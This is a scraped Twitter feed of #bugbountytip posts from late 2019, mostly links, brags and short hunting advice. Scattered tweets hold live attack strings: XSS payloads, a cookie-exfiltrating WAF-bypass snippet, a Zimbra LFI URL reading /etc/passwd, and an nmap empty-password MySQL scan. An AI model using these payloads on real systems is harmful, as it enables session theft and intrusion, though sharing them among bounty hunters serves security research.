3 #OSCP Like VMS ! Lets #TryHarder ! Part 2 - Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/ofajN5TlU9
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2020-01-05 04:23:37
0 #OSCP Like VMS ! Lets #TryHarder ! Part 1 - Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/469VcpzzPb
android_security
@pwn0sec


2020-01-05 01:15:15
1 Learning Pentesting for Android devices https://t.co/AR2CVpCENh #bugbounty #bugbountytip #bugbountytips #android
bugbountytip
@a_l_e_r_t_1_


2020-01-04 16:11:56
1 XSS waf bypass challenge... Please share your favorite xss payload for waf bypass... My favorite : ">'><details/open/ontoggle=confirm('XSS')> #bugbountytip #bugbountytips #hackingcommunity
James Nunes
@jamesgnunes


2020-01-04 13:39:08
0 So, @Xiaomi says it has fixed Mi Home Security Camera bug that displayed pictures from other cameras on Google Nest hub. https://t.co/6b5btrAPnk #Xiaomi #Google #bugbountytip #bughead #tech #TechNews #technology #blog #blogger #WordPress
Evan Custodio
@defparam


2020-01-04 00:13:12
0 An HTTP Request Smuggling CL.TE bug lets you redirect a victim connection to a forged endpoint with GET parameters. FYI you can execute a forged graphql query this way on the victim by using: GET /graphql?query=<query> #bugbountytip
m0z
@LooseSecurity


2020-01-03 19:48:43
7 A cool list by @vaib25vicky which indexes useful resources for educating yourself about mobile security! It's a cool area to get into with lots of #bugbounties to be found. https://t.co/AZpQyQNwUN #BugBounty #bugbountytips #bugbountytip
Hendrik
@hendrikvb


2020-01-03 19:46:57
0 Awesome tool to get your target initial recon! #infosec #bugbountytip https://t.co/ysJXq6Yi4t
Bala Elangovãn
@balaelangovan03


2020-01-03 18:47:40
1 My first blog about "How to get started in bug bounty? (Newbie's Perspective)". https://t.co/jHSoKDM7Yo #bugbountytips #bugbountytip #bugbounty
Ammar Amer
@cry__pto


2020-01-03 18:30:16
8 Practice part (2): https://t.co/X281shcjyP https://t.co/spNrTQFgSb https://t.co/vHcoFvviU4 https://t.co/sezBbjXqqh https://t.co/lN4dzsQzSK https://t.co/M9acV7uh2L https://t.co/3wpLokyrgW https://t.co/A1qXCSlOA3 https://t.co/XiR5giK6K9 #BugBounty #bugbountytip #hacking #pentest
noobSecurity
@noobsec_org


2020-01-03 02:00:45
5 P1 on new year (zimbra LFI) [https://t.co/Ab4o1tOu0o]/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../etc/passwd%00 #bugbounty #togetherwehitharder #bugbountytips #bugbountytip https://t.co/NH7meUlaH0
m0z
@LooseSecurity


2020-01-02 20:30:41
1 We are almost at 1,000 members in the League of Bounties discord server! Thanks to all the members who always make it a great chat. :) https://t.co/tVOlrpA4KP #bugbountytips #BugBounty2020Goals #bugbountytip
Arshad Aman
@MeArshadaman


2020-01-02 14:57:03
0 When You Go to HackerOne and see Bounty of $20000 but already claimed by someone else, Then #hacking #cybersecurity #BugBounty2020Goals #bugbountytip @Hacker0x01 @Bugcrowd https://t.co/M6xq9TArVj
Selim Enes Karaduman
@Enesdex


2020-01-02 00:02:45
1 Are all subdomains of https://t.co/UJzSqq2q8o in scope or just https://t.co/I6tTfy4Xfw? I found a bug on a subdomain of spotify but I'm confused about its in scope or not #BugBounty #bugbountytips #bugbountytip #hackerone @Spotify @Hacker0x01 @alicanact60 https://t.co/44Xo60yvM9
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2020-01-01 16:23:31
0 #Protip: If a website uses your photo and crops them into the avatar, there may be a good chance that the website is using ImageMagick to do that. Follow Us 💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip
Elsadat ✪
@M0_SADAT


2020-01-01 14:53:06
0 Yaaay, what a great start of 2020!!! Just discovered my 2nd SQL injection on private program @Bugcrowd ! I guess I’m the 1st hacker found P1 on 2020🔥 Happy new year https://t.co/rYxy7EDxzk you made my day😂 #bugbountytip SQLI still alive! #bugbounty #HappyNew2020 #hacking https://t.co/G1GJuet3A4
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2020-01-01 12:11:47
3 Thats When We Decided To Become BUG HUNTERS ! ❤️💰💰💰💰 Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity https://t.co/Ki3Tvkbeia
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2020-01-01 08:45:22
0 Happy New Year Hackers and Bug Bounty Hunters ! Have an Awesome Year with lots of Bounties and $$ Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting https://t.co/7t7Lm5yn0r
drivertom
@drivertomtt


2020-01-01 01:50:28
2 Just curious about whether twitter bots click Like merely by hashtag #malware #APT #cybersecurity #bugbounty #bugbountytips #bugbountytip
m0z
@LooseSecurity


2019-12-31 20:50:41
1 Here are 2 tools which are useful for scraping subdomains/directories in javascript files. https://t.co/VCZ4tzZamU by @jobertabma https://t.co/b0NRR2ub2w by the best hacker in the world #bugbounty #bugbountytips #bugbountytip
m0z
@LooseSecurity


2019-12-31 20:45:48
3 I'm still hosting 2 #XSS challenges on my challenge site! https://t.co/cNYQsW7qVi Both were inspired by real bounties I have found! If you haven't already tried your hand at them, it's well worth a go. #bugbounty #bugbountytip #bugbountytips #infosec
Ammar Amer
@cry__pto


2019-12-31 19:40:35
4 #bugbounty tools part (1): tko-subs:https://t.co/Tawtj1NvWc truffleHog:https://t.co/B3OeZDOdH0 subfinder:https://t.co/QqNOKFuHk1 sslScrape:https://t.co/448jbQ2nbw Gobuster:https://t.co/NI2PnTIFdy SecLists:https://t.co/QPSqeXvWix EyeWitness:https://t.co/461kpUL5CA #bugbountytip
Khaled
@Khaled95677506


2019-12-30 17:34:29
0 My 1st RCE😎 With my bro Osama Alaa. Don't forget to test PHP-CGI, it may give you RCE #bugbountytips #BugBounty #bugbountytip https://t.co/iyLami2sWr
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-12-30 17:32:47
0 StrandHogg Bug - Unpatched Android OS Vulnerability #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #ceh #eccouncil #certification #hackerone https://t.co/8Cr6ShD9jf
Nick || hunt4p1zza
@ngkogkos


2019-12-30 16:58:55
0 Need target specific folders list for fuzzing based on robots.txt? Use @TomNomNom's meg tool: 1. meg -c 200 path.txt urls.txt meg_robots 2. cat meg_robots/index | grep "200 OK" | awk '{print $1}'| xargs cat | grep "Disallow:" | awk '{print $2}' | sort -u #bugbountytip #bugbounty
bug bounty tips - Retweet
@BugbountytipsR


2019-12-30 13:22:23
2 CAN YOU EARN $15000 BY CLICKJACKING? Raushan Raj ========== ^This man did [Tag him if you know his twitter handle] #bugbountytips #bugbountytip WriteuP https://t.co/QhE7nmsJEB
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-12-30 12:21:45
6 ✈️Use Telegram bot as a Penetration Testing Framework 🏆🏆🎖🎖💰💰 Follow this page and learn Bug Bounty Tips and Tricks https://t.co/27kPwhJVdt #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone
Larouanne Tristan
@Tr4LSecurity


2019-12-30 10:47:25
0 Doing some #pentesting in a company using #maven ? Look for xml file in the user .m2 folder. This contains password easily decryptable https://t.co/dg9nBqjWoT #infosec #hacking #pentest #CyberSecurity #bugbountytips #bugbountytip #java
გოჩა ოქრაძე (Gocha Okradze)
@GochaOqradze


2019-12-30 10:34:05
0 #burp #bugbountytips #bugbountytip RCE with Burp Suite intruder + Regex https://t.co/JmpAvEfNr3 via @YouTube
Men up
@uppmen


2019-12-30 00:42:39
0 How did I earn $3133.70 from Google Translator? @Google @TranslateTricks #BugBounty #bugbountytip #BugBounty2020Goals 😆 https://t.co/nVwersBz1n
Dr.FarFar ⓲
@3XS0


2019-12-29 20:53:47
0 Old #bugbountytip from 5 years ago! https://t.co/4o2f9Wgs7A …
ghostlulz
@ghostlulz1337


2019-12-29 19:52:43
13 Source Code Analysis SQLI: https://t.co/m5K3yzo6iU Source Code Analysis XSS: https://t.co/Ke274Lvc9e Source Code Analysis Race Condition: https://t.co/jycSCNE9ms Bug Bounty Book - https://t.co/zJFRZjg5q2 #BugBounty #bugbountytip #bugbountytips #redteam #infosec #xss #dfir https://t.co/vP7FxiOTGH
Nick || hunt4p1zza
@ngkogkos


2019-12-29 18:22:20
0 If you are not using @hacker_'s getallurls Go tool when doing #recon & #bugbounty you are missing out on interesting URLs/endpoints as it fetches from 3 sources: AlienVault/Wayback Machine/Common Crawl. Before using check you are not IP blocked from these. #bugbountytip https://t.co/rj0EjuXs1t
Sahil Ahamad
@ehsahil


2019-12-29 16:11:02
11 Time for #bugbountytip - always look for 3 types of employee in a company from Linkedin or other sources. 1. DevOps/SRE 2. Data Science 3. Tech Interns It will help a lot from your recon perspective and you will be amazed to see the results. #bugbountytips #HappyHacking
ghostlulz
@ghostlulz1337


2019-12-29 15:56:37
5 Clickjacking is an easy $100 - $500 vulnerability. Super easy to find and often forgotten by developers and hunters alike. Easy wins all day. More info on my blog: https://t.co/kcOYSJcbUG #BugBounty #bugbountytips #bugbountytip #infosec #appsec #osint #xss #redteam #dfir https://t.co/4zPbulEHqC
Andy Garcia
@GaelleTjat


2019-12-29 15:49:12
2 For sure horizontal moves require some form knowledge of the vertical ones. Referring to the Cors Lab 3 where you need to know/read XSS in order to solve the lab 🤦🏾‍♀️🤦🏾‍♀️🤦🏾‍♀️ #BugBounty #bugbountytip #BugBounty2020Goals
Vishnu Vardhan Gadupudi
@vishu10x00


2019-12-29 15:18:24
0 If you spend most of your time in low speed internet connection like me i.e > 100KB/sec just use Google cloud shell which is free or just use a cheap vps providers like digital ocean :) #bugbountytip https://t.co/CvazXZy8p1
bug bounty tips - Retweet
@BugbountytipsR


2019-12-29 03:45:01
0 "The more you talk, the more they REVEAL" TIP : Check The Server Response Carefully x 3 Tool TIPs: You can modify response by burp [FACEBOOK HACKED] by EVIL BOY AJAY @evilboyajay wRITEUp https://t.co/26eGroHHNu #bugbountytip #bugbountytips
🧠🏴‍☠️Borbolla
@renatoborbolla


2019-12-29 03:29:38
0 Best #firefox addons for #Hacking: -HackBar -Cookies Manager+ -User-Agent Switcher -Tamper Data -FoxyProxy Standard -Wappalyzer: -HttpRequester -RESTClient: -Tampermonkey -XSS Me -SQL Inject Me -iMacros -FirePHP #bugbountytips #bugbountytip #hacking #OSINT #Pentesting
Pentester /KökBüre
@GokBoruEfe


2019-12-28 23:40:34
1 Best #firefox addons for #Hacking: -HackBar -Cookies Manager+ -User-Agent Switcher -Tamper Data -FoxyProxy Standard -Wappalyzer: -HttpRequester -RESTClient: -Tampermonkey -XSS Me -SQL Inject Me -iMacros -FirePHP #bugbountytips #bugbountytip #hacking #OSINT #pentest
plenum 🇹🇳
@plenumlab


2019-12-28 20:52:16
0 There are only two kinds of infosec folks: - Those who say P.O.C - Those who say POC as POK There you have it now you know. #bugbountytips #bugbountytip
Antonio
@HerrJoost


2019-12-28 20:25:31
2 Best budget notebook focused on programming /#bugbounty? #bugbountytip
ghostlulz
@ghostlulz1337


2019-12-28 16:17:21
7 Cross-Origin Resource Sharing (CORS) can be used to bypass the Same Origin Policy(SOP) and read sensitive user data if implemented improperly. Easy wins all day. Learn more on my blog: https://t.co/ZdNpP9a3hy #BugBounty #bugbountytip #bugbountytips #infosec #appsec #osint #cors https://t.co/hR0qm2YeGc
გოჩა ოქრაძე (Gocha Okradze)
@GochaOqradze


2019-12-28 14:58:50
0 #bugbountytips #bugbountytip #Brutelogic #knoxss Thank @rodoassis for this test page. When you love xss and try do it in your phone browser: Android mozilla https://t.co/sRV8TzIgIP
ghostlulz
@ghostlulz1337


2019-12-28 13:31:41
30 If you're looking to make a living doing bug bounties or penetration testing you may want to get a copy of my book: https://t.co/zJFRZjg5q2 #bugbounty #xss #osint #redteam #bugbountytips #bugbountytip #infosec https://t.co/fVT4hqpfpi
Ashish Kunwar
@D0rkerDevil


2019-12-28 12:50:58
1 #bugbountytip do asn lookups and do nmap scan on cidr range[s]. and you might end up with juicy services like rpcbind , snmp etc or panels having default creds.
Nouroz Gaming
@NourozGaming


2019-12-28 10:01:10
1 Best #firefox addons for #Hacking: -HackBar -Cookies Manager+ -User-Agent Switcher -Tamper Data -FoxyProxy Standard -Wappalyzer: -HttpRequester -RESTClient: -Tampermonkey -XSS Me -SQL Inject Me -iMacros -FirePHP #bugbountytips #bugbountytip #hacking #OSINT #pentest
Ammar Amer
@cry__pto


2019-12-28 08:15:48
9 Best #firefox addons for #Hacking: -HackBar -Cookies Manager+ -User-Agent Switcher -Tamper Data -FoxyProxy Standard -Wappalyzer: -HttpRequester -RESTClient: -Tampermonkey -XSS Me -SQL Inject Me -iMacros -FirePHP #bugbountytips #bugbountytip #hacking #OSINT #pentest
Ammar Amer
@cry__pto


2019-12-28 07:58:17
17 Reverse Shell Cheat Sheet TooL: https://t.co/ROjGR5MCTl #bugbountytip #hacking #pentest https://t.co/00p6QbX7sO
Ammar Amer
@cry__pto


2019-12-28 07:53:24
7 JexBoss: Jboss (and Java Deserialization Vulnerabilities) verify and EXploitation Tool: https://t.co/EMKunAzMS5 #bugbountytip #hacking #pentest
m0z
@LooseSecurity


2019-12-28 00:51:41
0 A nice find by @s3c_krd which is definitely worth checking out: https://t.co/JRj3kv0zDI CRLF Injection is kinda rare to come by these days, but this was a cool PoC on Twitter. :) #bugbounty #bugbountytip #bugbountytips
Th3Alch3mist~
@Debian_Hunter


2019-12-27 17:06:41
2 Found this in a write-up and this is cool ....have a look XSSI:- https://t.co/s6baugCH6l JSONP:- https://t.co/BNkRFlwTnN #bugbountytips #bugbounty #bughunting #bugbountytip https://t.co/9SXzd4t9Kw
Tinu rockk
@TinuRock007


2019-12-27 15:41:10
0 finally secure @sony 2019 arrived as xmas gift :) #swag #bugbountytips #bugbountytip #cybersecurity #sony #hackerone #togetherwehitharder https://t.co/77H3eJ2uV9
Mashoud1122
@mashoud1122


2019-12-27 09:28:34
2 Did my 1st collab with @OriginalSicksec and @Skeletorkeys We got an amazing XSS on https://t.co/mVGZMsShQL WAF Bypass used: document.write(atob('PGltZyBzcmM9aHR0cDovL2xvY2FsaG9zdDo4MDkvcD89') + btoa(document.cookie) + '>') #bugbountytips #bugbountytip #BugBounty https://t.co/xkL6Dr47ed
D Ξ Ξ P Λ K ⚙️
@Deepak_maxx


2019-12-27 06:40:48
0 Hey @NahamSec just so you know people in India pronounce your name as "Ben shani-singhnapur" ! 🙃 #bugbounty #bughunter #bugbountytips #bugbountytip
cor3_cls
@cor3_cls


2019-12-26 20:01:06
3 @enigmaticsoulrg @zPrototype2 @gobias_infosec paid: @PentesterLab. Free: @hacker0x01 Hacker101 site and CTF. @Bugcrowd levelup and university <3 (youtube & git), and the best for me is @PortSwigger @WebSecAcademy Also #bugbountytip hashtag and @intigriti tips are very informative.
Karna
@karna__1


2019-12-26 17:56:24
0 To all those who want to know 'How do I get started with Bug Bounties?', go through the threads! #bugbounty #bugbountytips #infosec #bugbountytip #gettingstarted https://t.co/kgXdWqIHJ2
D Ξ Ξ P Λ K ⚙️
@Deepak_maxx


2019-12-26 13:09:29
5 Port scanning can be seen as, or construed as, a crime. We should never execute a port scanner against any website or IP address without explicit, written permission from the owner of the server or computer that you're targeting #infosecurity #infosec #cybersecurity #bugbountytip
Ajay Gautam
@evilboyajay


2019-12-26 10:29:34
2 Check out my new blog about Bypassing Brand Collabs Manager Eligibility. #bugbountytip #bugbounty #cybersecurity https://t.co/VpLI1UNVz6
Nassec.io
@nassecio


2019-12-26 10:26:23
3 @evilboyajay has a new write up for the bug bounty community. Check out our weekly blog about Brand Collabs Manager bypass on Facebook. #infosec #infosecmatters #hacking #bugbounty #bugbountytip https://t.co/4TDqHCMUso
Andy InfoSec
@AndyInfoSec_


2019-12-26 07:22:01
0 Part 3: Resources about #GraphQL #bugbounty Facebook GraphQL CSRF: https://t.co/7LnN4yo1Zp Tools : https://t.co/I52mNTERIN https://t.co/MHIuNuvaHC https://t.co/qlCtI5KJMI https://t.co/LPOkb9LtSj #cybersecurity #bugbountytip #bug #bounty #vapt #andyinfosec
Texy45
@RegisDeldicque


2019-12-26 06:06:42
0 @yeswehack @intigriti #bugbountytips #bugbountytip Tips : if your target forward http to https urls, try to add %0a char at the end of http urls. You could probably find out juicy paths.
Asad Anwar
@AsadAnw90


2019-12-25 23:25:13
0 Always look "view-source" page, sometime html page containing secret key. #bugbountytip #bugbounty https://t.co/VxzIgzVd06
Cryptographer
@crypt0gr4ph3r


2019-12-25 16:50:02
0 #bugbountytip When token says invalid on password change when unauthorisation. Try to use the same invalid token when authorisation. Low severity account takeover , awarded $200 bounty #hackerone #bugbounty #hacker101
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-12-25 07:22:52
0 OWASP Events Calendar - Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to YouTube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #pentesting #devsecops #cybersecurity #ceh #eccouncil #owasp #hackerone https://t.co/q2BFcxrK65
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-12-25 07:14:39
3 Windows Process Hacking Library Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to YouTube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #pentesting #devsecops #cybersecurity #ceh #FolloMe https://t.co/t6TtdwgfQm
Sayaan Alam
@ehsayaan


2019-12-25 06:01:11
0 Finally Done with LazyRecon Set-Up on Ubuntu VM , Thanks to @NahamSec For this great script.. #bugbountytip #bugbounty https://t.co/XLxtx3FAKS
warbid
@id_warb


2019-12-25 02:02:44
0 Why does everyone talk about PDO if it doesn't work? Yet another case IRL. #bugbountytip https://t.co/efz78UQSd6
bug bounty tips - Retweet
@BugbountytipsR


2019-12-24 16:22:32
0 WEB CACHE POISONING HOST HEADER INJECTION by James Kettle @albinowax #bugbountytip #bugbountytips #bugbounty https://t.co/Lau7339zXG
Jinone
@jinonehk


2019-12-24 07:47:07
1 New Write-up About a dom xss From a private project 500$ https://t.co/oa4JnqhtwB Merry Christmas to you all ! Thanks @Hacker0x01 #TogetherWeHitHarder #BugBounty #bugbountytip
Ammar Amer🇸🇾
@cry__pto


2019-12-24 07:40:18
3 Finding root accounts with an empty password in MySQL servers: nmap -p3306 --script mysql-empty-password xx.xx.xx.xx #Hacking #bugbountytip #Pentesting
Sayaan Alam
@ehsayaan


2019-12-24 02:32:45
0 Yay!!! Another 10k Awarded From TataCliq For Multiple Rate Limiting Issues!!! Great BB Program.. 2 More Triaged.. #bugbounty #bugbountytip #togetherwehitharder
Ricardo Freitas
@0x61737078


2019-12-24 02:11:26
0 RT @andripwn: RT @pwn0sec: Web cache poisoning attack https://t.co/6f6dxXBZTL #bugbounty #bugbountytip #bugbountytips #webcache_poisoning_attack
Ash
@m0rph1n3e


2019-12-23 23:15:55
0 is it possible to bypass the file extension in Local File Inclusion? URL Example: https://blahblahblah/?language=english which reads from english.html ( only html files ) #bugbounty #bugbountytip #bugbountytips #hacker0x01 #LFI
Security Executions Code
@pwn0sec


2019-12-23 20:58:18
0 File Path Traversal Using Burp-suite (Intruder) https://t.co/CmPakEgzfB #bugbountytip #bugbountytips #path_traversal #burpsuite #intruder
ghostlulz
@ghostlulz1337


2019-12-23 17:03:56
9 A Race Condition allowed one person to steal over $1,000,000 dollars from an ATM. If you're curious how to detect these type of flaws check out my blog: https://t.co/jycSCNE9ms #BugBounty #bugbountytip #bugbountytips #infosec #redteam #osint #xss #pentest #appsec #DFIR https://t.co/DxXsgzyZ0Z
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-12-23 11:05:40
2 Top #pentesting and Bug Bounty Burp Extensions https://t.co/naoLUFqmPu #hackdoor #bugbounty #bugbountytip #bugbountytips #hacker #penetrationtesting #pentesting #devops #devsecops
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-12-23 11:03:19
4 Hardware Hacker Bee #hackdoor #bugbounty #bugbountytip #bugbountytips #hacker #penetrationtesting #pentesting #devops #devsecops https://t.co/KHAvODLYHa
გოჩა ოქრაძე (Gocha Okradze)
@GochaOqradze


2019-12-22 21:40:06
1 #bugboutytips, #bugbountytip, #burp Detect file path traversal by Burp Suite intruder + regex https://t.co/T1xb4tCsLV via @YouTube
გოჩა ოქრაძე (Gocha Okradze)
@GochaOqradze


2019-12-22 21:37:21
2 #bugbountytip, #bugbountytips, #burp, #xss Easy way detect easy reflect XSS. Easy Reflect XSS Burp Intruder https://t.co/oYRVhwD1VA via @YouTube
Ammar Amer🇸🇾
@cry__pto


2019-12-22 16:49:04
0 Pentesting-Bible #hacking #pentest #redteam #OSINT #malware #CyberSecurity #ctf #bugbountytip it is just the beginning!😎 https://t.co/MmUnOQkJ7a
Andy Garcia
@GaelleTjat


2019-12-22 16:48:33
0 Great reading. #Infosec #Infosectips #bugbountytip https://t.co/NmloxT9KE3
Sunil
@Sunilkande1137


2019-12-22 14:33:19
0 Vimeo upload function SSRF by @dPhoeniixx https://t.co/DMIZfZoHJA #hacking #pentesting #bugbounty #recon #pentest #infosec #cybersecurity #itsecurity #websecurity #appsec #hacker #security #Hackers #Android #Androidhacking #bugbountytips #bugbountytip #hackerone #ssrf #hacking
ईशान सिंह
@R0X4R


2019-12-22 13:23:57
1 Filter bypass for xss in input tag. #bugbountytip #bugbounty #xss #hacking #happytosecure #bugbountycommunity #bugbountytips https://t.co/98c2ORAMwW
Karna
@karna__1


2019-12-22 13:08:46
0 Converted IP formats can be used to bypass blacklisted IP addresses while trying SSRFs. You just need to do 3 steps and you can convert formats at any time using your terminal. Happy Hunting! #bugbountytip #bugbountytips #infosec #AUTOMATION (2/2)
Ammar Amer🇸🇾
@cry__pto


2019-12-22 08:56:42
1 -1-2000 articles as pdf files & 2000 links to advanced articles and resources about different fields of ethical hacking and programming -2-114 detailed osint tips: -how to gather info & why -useful tools https://t.co/xGKKQoPyyq #bugbountytip #Hacking #OSINT #Pentesting #redteam
Brodie Codie ™
@brodie_codie


2019-12-22 07:31:56
0 Not a bad week, submitted 5 Cross-site scripting (XSS) vulnerability Reports... now the waiting game begins <a onmouseover="alert(document.cookie)">xxs link</a> "><img src=x onerror=alert(domain)> #bugbountytips #bugbountytip
ईशान सिंह
@R0X4R


2019-12-22 04:58:41
1 Filter bypass for xss in input tag. #bugbountytip #bugbounty #xss #hacking #happytosecure #bugbountycommunity #bugbountytips https://t.co/9vrKqD7lnY
Hendrik
@hendrikvb


2019-12-21 21:00:28
0 Obviously whatweb (@urbanadventur3r) will provide interesting results too! #bugbountytip https://t.co/z1uuPGsmcZ
ghostlulz
@ghostlulz1337


2019-12-21 13:04:48
4 🎅 MERRY CHRISTMAS 🎅 If you're looking for a good read over the holiday you should check out my Bug Bounty Book. Instead of spending money you could be making money💰 https://t.co/zJFRZjg5q2 #BugBounty #bugbountytips #bugbountytip #osint #xss #appsec #dfir #redteam #hackers https://t.co/wWp4w7lmFM
drivertom
@drivertomtt


2019-12-21 12:13:30
0 How to defeat webshell scanners #bugbountytips #bugbountytip https://t.co/A79IMJYhtk
bug bounty tips - Retweet
@BugbountytipsR


2019-12-21 04:46:45
0 @iagox86 Tools - Padbuster Poracle Ciphers - CAST-cbc aes-128-cbc aes-192-cbc aes-256-cbc bf-cbc camellia-128-cbc camellia-192-cbc camellia-256-cbc cast-cbc cast5-cbc des-cbc des-ede-cbc des-ede3-cbc desx-cbc rc2-40-cbc rc2-64-cbc rc2-cbc seed-cbc #bugbountytip #bugbountytips 2/2
bug bounty tips - Retweet
@BugbountytipsR


2019-12-21 04:42:02
0 DECRYPT CIPHER WITHOUT THE KEY Padding Oracle Attack in Detail by Ron Bowes @iagox86 Explanation https://t.co/KWuU3SruSj An Example https://t.co/u0DcQnqa0o Encrypt data https://t.co/NnH2sXuoXT Practice https://t.co/xtgWVCO63p #Pastebin #bugbountytip #bugbountytips (1/2)
ghostlulz
@ghostlulz1337


2019-12-21 02:32:20
8 Wayback SQL Scanner - https://t.co/IcaV2mPjQV Swagger API - https://t.co/5toTZrRmdz New Robots.txt - https://t.co/IsyaPyECWG CSV Injection - https://t.co/loAf6mRXft XXE - https://t.co/vhpq7Bjg4d #BugBounty #bugbountytips #bugbountytip #infosec #osint #xss #appsec #hacking https://t.co/DGkhLNFata
Tarek Mohammed
@Conan0x3


2019-12-20 21:05:46
0 - Get a slack notification from "Monitorizer" about new sub-domains for a target - Found sub-domain for splunk enterprise - Search exploits for current version - Found CVE allow to disclose the server info along with product license key :D #bugbountytip #BugBounty https://t.co/fULk1BZbwP
Inon Shkedy
@InonShkedy


2019-12-20 01:50:06
2 Pentest for APIs? Leverage the predictable nature of REST APIs to find admin API endpoints! For example, if you saw the following API call: GET /api/v1/users/<id> Give it a chance, and change to DELETE / POST to create / delete users. #bugbountytip #bugbounty
Jesse Clark
@Hogarth45_ND


2019-12-19 23:12:22
1 On @Hacker0x01 use the Scope Version page to be ensured you are seeing the entire scope for program. Some times you can find several domains listed that are not reflected on the regular policy page. #bugbountytip https://t.co/9aHu40ON8I
Kenan
@h1_kenan


2019-12-19 21:59:09
0 It is time! https://t.co/oVgbVlEwQj #XSS #hacking #security #bugbountytip Please RT if you like. thanks
Yadhavi
@PrincessYadhavi


2019-12-19 18:44:19
2 "$HOME/bugbounty/platform(ht,bugcrowd,etc)/program(verizonmedia)/target(yahoo)/target(com)(if scope has multiple TLDs)/date(dec-20)/tool(masscan)/filename (with toolname to easily identify)(yahoo.com-masscan.txt)" #bugbountytips #bugbounty #bugbountytip
Yadhavi
@PrincessYadhavi


2019-12-19 18:39:53
0 Use same directory structure on all of your systems.(windows, kali vm, vps). It'll save a lot of time. my directory structure for masscan on yahoo: "$HOME/bugbounty/h1/verzionmedia/yahoo/com/dec-20/masscan/yahoo.com-masscan.txt" #bugbountytips #bugbounty #bugbountytip
Apoorv Raj Saxena
@secxena


2019-12-19 16:02:04
1 I just published CredCheck - A credential Pentesting framework #bugbountytool #bugbounty #bugbountytip #Section144 https://t.co/zVlMCiIhpN
ak1t4 🇦🇷
@akita_zen


2019-12-19 15:52:43
1 #bugbountytip: The Program always has the last word, Not the Triaging Analyst. Keep pushing until program security team ping you with a "clear" feedback. *Most of triagers/analyst prioritizes customers than bugbounty hunters , even when your report is valid. #bugbounty #infosec
Sebastian Wieseler
@kickino


2019-12-19 14:13:45
0 Second subdomain takeover within a few days. 🥳🥳 The bugs are all around. They’re just waiting for you to find them #bugbounty #bugbountytip #togetherwehitharder
Sanketh Sharath
@sharathsanketh


2019-12-19 13:38:04
3 After 6 months of bug hunting, i have taken a step back to pause and go back to reading and training (labs) this month. On reading again, I realised I didn't know shit about shit. Learning never ends. I really recommend newbies do this! #bugbounty #bugbountytips #bugbountytip
bug bounty tips - Retweet
@BugbountytipsR


2019-12-19 11:56:28
0 Parameter Pollution #bugbountytips #bugbountytip #bugbounty https://t.co/UolTrcx2q8
Fisher
@Regala_


2019-12-19 09:13:28
0 Actually, here's my top tip for writing a good report: you should be able to follow and reproduce the steps on YOUR own report after some time has passed #bugbounty #bugbountytip
d0nut
@d0nutptr


2019-12-19 01:03:37
0 @John08369305 @uraniumhacker @intigriti You might say “then teach them!” Which I have more than most... but even the people I’ve spent hours on don’t seem to “get it”. Then they go around bringing others down with their misunderstandings. Just look at #bugbountytip . Like half of these are garbage.
mohsin khan
@mohsink83789226


2019-12-18 16:57:34
0 Please share web pentesting resources with me #bug #bugbountytips #bugbountytip #hacking #Hacker #bountyhunter #bounty
Rafin Rahman Chy
@rafinrahmanchy


2019-12-18 14:06:23
6 Required Skills for Facebook Bug Bounty *Web App Pentesting *Facebook API *graphQL *Burp Suite *Studying PoCs #BugBounty #bugbountytip #bugbountytips #EthicalHacker #EthicalHacking #Hacking #Hacker #Hackers #InfoSec #Infosecurity #ITsecurity #ITSec #netsec #appsec #websecurity https://t.co/AprGSWj64P
0x8hany
@Haniawad


2019-12-18 02:25:10
5 As @zseano always saying lazy developer reuse the code :) #BugBounty #bugbountytip https://t.co/NKfPRcd5f0
ghostlulz
@ghostlulz1337


2019-12-17 21:27:13
7 SQL injection is one of the most popular vulnerabilities out there yet there seems to be a lack of people who can identify this flaw in an application's source code. More info on my blog: https://t.co/m5K3yzo6iU #BugBounty #bugbountytip #bugbountytips #infosec #xss #sqli #osint https://t.co/BeKWOSmNpY
Fisher
@Regala_


